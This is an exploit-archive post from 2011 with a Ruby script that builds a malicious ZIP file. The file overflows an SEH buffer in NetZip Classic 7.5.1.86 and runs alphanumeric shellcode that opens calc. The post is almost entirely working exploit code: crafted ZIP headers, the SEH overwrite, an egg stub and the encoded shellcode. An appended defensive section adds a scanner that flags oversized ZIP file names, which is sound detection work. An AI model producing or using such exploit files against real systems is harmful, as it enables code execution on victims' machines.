NetZip Classic Buffer Overflow
Posted Jan 31, 2011
Authored by C4SS!0 G0M3S

NetZip Classic version 7.5.1.86 suffers from a buffer overflow vulnerability.

tags | exploit, overflow
SHA-256 | b462ddd12de0e26eed6e4e503299b62039e811a935a0515a698eae884565b327

#
#
#[+]Exploit Title: Exploit Buffer Overflow NetZip Classic(SEH)
#[+]Date: 01\30\\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://proforma.real.com/real/nzclassic/nzclassic.html
#[+]Version: 7.5.1.86
#[+]Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN
#[+]CVE: N/A
#
#The structure of the zip file was copied from the Corelan Team exploit.
#Thanks to Corelan Team for all the tutorials
#
#Created BY C4SS!0 G0M3S
#WWW.INVASAO.COM.BR
#Louredo_@hotmail.com
#
#

def usage()
system("cls")
system("color 4f");
str =
"""


####### # ###### ###### # #############
# ## # # # # #
# # # # # # # #
# ###### ###### ###### # # #
# # # # # # #
# # # # # # #
####### # ###### ###### 0 #############


[+]Exploit Buffer Overlfow NetZip Classic 7.5.1.86

[+]Author C4SS!0 G0M3S

[+]E-mail Louredo_@hotmail.com


"""
print str
end
if ARGV.length !=1
usage()
print "[-]Usage: "+$0+" <File Name>\n"
print "[-]Exemple: "+$0+" Exploit.zip\n"
exit
end
usage()
filename = ARGV[0]
head1 =
"\x50\x4B\x03\x04\x14\x00\x00"+
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\xe4\x0f" +
"\x00\x00\x00";

head2 =
"\x50\x4B\x01\x02\x14\x00\x14"+
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\xe4\x0f"+
"\x00\x00\x00\x00\x00\x00\x01\x00"+
"\x24\x00\x00\x00\x00\x00\x00\x00";

end1 =
"\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"+
"\x12\x10\x00\x00"+
"\x02\x10\x00\x00"+
"\x00\x00";

buffer = "\x41" * 235
nseh = "\x59\x40\x40\x40"
seh = [0x10057A41].pack('V')#
egg = "\x41" * 5 #4 INC ECX
egg += "\x61" * 6 #6 POPAD
egg += "\x04\x10" #ADD AL,10
egg += "\x98\xd1" #CALL EAX
egg += "\x41" * 5 #JUNK TO SHELLCODE
puts " [*]Identifying the length Shellcode\n\n"
sleep(1)
shellcode =
"PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIYKIPVQXIOO3L5FBPXLN9D"+
"46DJTNQ5N0XVQD84XK3M8KL33RXE8L4MUP02XOLSUO92XOFVCKEL3X4NNSM5RNJGJP2ELOOSRJM5M64X"+ #Shellcode WinExec("calc",0)
"USVQ9WQKWLVSPJUT1XJDFWEZUB4O7SLKKUKUURKZP179M1XKMWRP8EKI2M8YSZW7KCJ8OPL0O7SHSPSY"+ #ALPHA BASEADDRESS EAX
"41GL7XXWKLCLNK35O0WQCSTPQY1VSXML5O6L5IQCNMHJUNJL1UUOX7VMIWMWK9PXYKN0QE1OFTNVOMUT"+
"YK7OGT8FOPYLP3K8W5UCOM83KYZA"

puts " [*]The length is Shellcode: #{shellcode.length}\n\n"
sleep(1)


junk = "\x41" * (4064 - (buffer+nseh+seh+egg+shellcode).length)

payload = buffer+nseh+seh+egg+shellcode+junk

payload += ".txt"

exploit_zip = head1+payload+head2+payload+end1
puts " [*]Creating the File #{filename}\n\n"
sleep(1)
begin

f = File.open(filename,"w")
f.puts exploit_zip
f.close
puts " [*]The File #{filename} was Created with Success\n\n"
sleep(1)
rescue

puts " [*]Error When Creating The File #{filename}\n\n"
exit

end
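
From the defender's side, the central directory header built by the script above (`head2`) declares a file-name length of 0x0fe4 (4068 bytes), far beyond any legitimate path. The Ruby check below is an added example, not part of the original post: it scans an archive's local and central headers and flags oversized, truncated or control-character file names. `MAX_NAME`, the function names and the sample record are assumptions made for illustration.

```ruby
# Added example (not from the original post): flag ZIP headers whose
# file-name field is oversized, truncated or carries control bytes.
# Values are [kind, name-length offset, name offset] per the ZIP format.
ZIP_HEADERS = {
  "PK\x03\x04".b => [:local,   26, 30],
  "PK\x01\x02".b => [:central, 28, 46]
}.freeze
MAX_NAME = 260 # assumed threshold (Windows MAX_PATH); tune for your environment

# Returns one hash per suspicious header found in the raw archive bytes.
def suspicious_zip_names(data, max_name: MAX_NAME)
  data = data.b
  findings = []
  ZIP_HEADERS.each do |sig, (kind, len_off, name_off)|
    pos = 0
    while (pos = data.index(sig, pos))
      raw_len = data.byteslice(pos + len_off, 2)
      break if raw_len.nil? || raw_len.bytesize < 2 # header cut off at EOF
      name_len = raw_len.unpack1("v")               # little-endian uint16
      name = data.byteslice(pos + name_off, name_len) || "".b
      reasons = []
      reasons << :name_too_long  if name_len > max_name
      reasons << :name_truncated if name.bytesize < name_len
      reasons << :non_printable  if name.bytes.any? { |b| b < 0x20 || b == 0x7f }
      findings << { kind: kind, offset: pos, name_len: name_len, reasons: reasons } unless reasons.empty?
      pos += 4
    end
  end
  findings
end

# Constructed sample input: a minimal central-directory record for +name+.
def sample_central_record(name)
  "PK\x01\x02".b + [20, 20, 0, 0, 0, 0].pack("v6") + [0, 0, 0].pack("V3") +
    [name.bytesize, 0, 0, 0, 0].pack("v5") + [0, 0].pack("V2") + name.b
end

# Scan the file given on the command line, or the constructed sample if none.
if __FILE__ == $PROGRAM_NAME
  data = ARGV[0] ? File.binread(ARGV[0]) : sample_central_record("A" * 4068)
  suspicious_zip_names(data).each { |f| puts f.inspect }
end
```

The check reads only header fields and never extracts entries, so it can run in a mail or upload filter before an archive reaches a desktop unzip tool.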
